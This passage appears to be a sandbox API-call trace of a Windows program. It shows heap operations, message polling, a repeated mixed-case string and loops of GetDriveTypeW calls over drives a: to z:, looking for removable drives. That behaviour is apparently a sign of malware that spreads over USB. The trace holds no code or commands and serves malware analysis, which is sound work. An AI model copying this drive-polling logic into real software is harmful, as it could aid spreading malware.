lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0218.830] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0218.830] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0218.830] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.830] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.830] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.830] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.831] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.831] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.831] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.831] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.831] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.831] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.831] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.831] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0218.831] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.831] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.831] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.831] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.832] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.832] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.832] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.832] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.832] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.832] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.833] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.833] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.833] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.834] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.834] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.834] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.834] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.835] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.835] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.835] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.835] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.835] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.836] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.836] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.836] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.836] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.837] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.837] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.838] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.838] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.838] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0218.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0218.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0218.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.838] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.838] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.838] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0218.838] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0218.838] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0218.839] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0218.839] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.839] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.839] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.839] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0218.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.839] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0218.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0218.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.840] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0218.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0218.840] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.840] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.840] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.840] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.840] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.841] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.841] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.841] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.841] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.841] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.842] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.842] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.842] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.842] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.842] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.842] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.843] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.843] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.843] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.843] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.843] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.844] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.844] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.844] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.844] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.844] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.845] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0218.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.845] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.845] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.845] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0218.845] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.845] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.845] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.845] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0218.845] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.845] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.846] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0218.846] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0218.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0218.846] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0218.846] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0218.846] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.846] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0218.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.847] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0218.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0218.847] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0218.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0218.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.847] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0218.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0218.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.847] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.847] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.848] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.848] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.848] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.848] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.848] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.848] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.849] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.849] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.849] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.849] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.849] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.849] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.849] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.850] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.850] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.850] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.850] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.850] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.850] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.851] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.851] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.851] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.851] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.851] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.852] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.852] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.852] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.852] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.852] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.852] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.852] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.852] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.852] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.852] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.853] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.853] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.853] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0218.853] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.853] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0218.853] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0218.853] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.853] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0218.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0218.853] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0218.853] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0218.854] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.854] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.854] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0218.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, 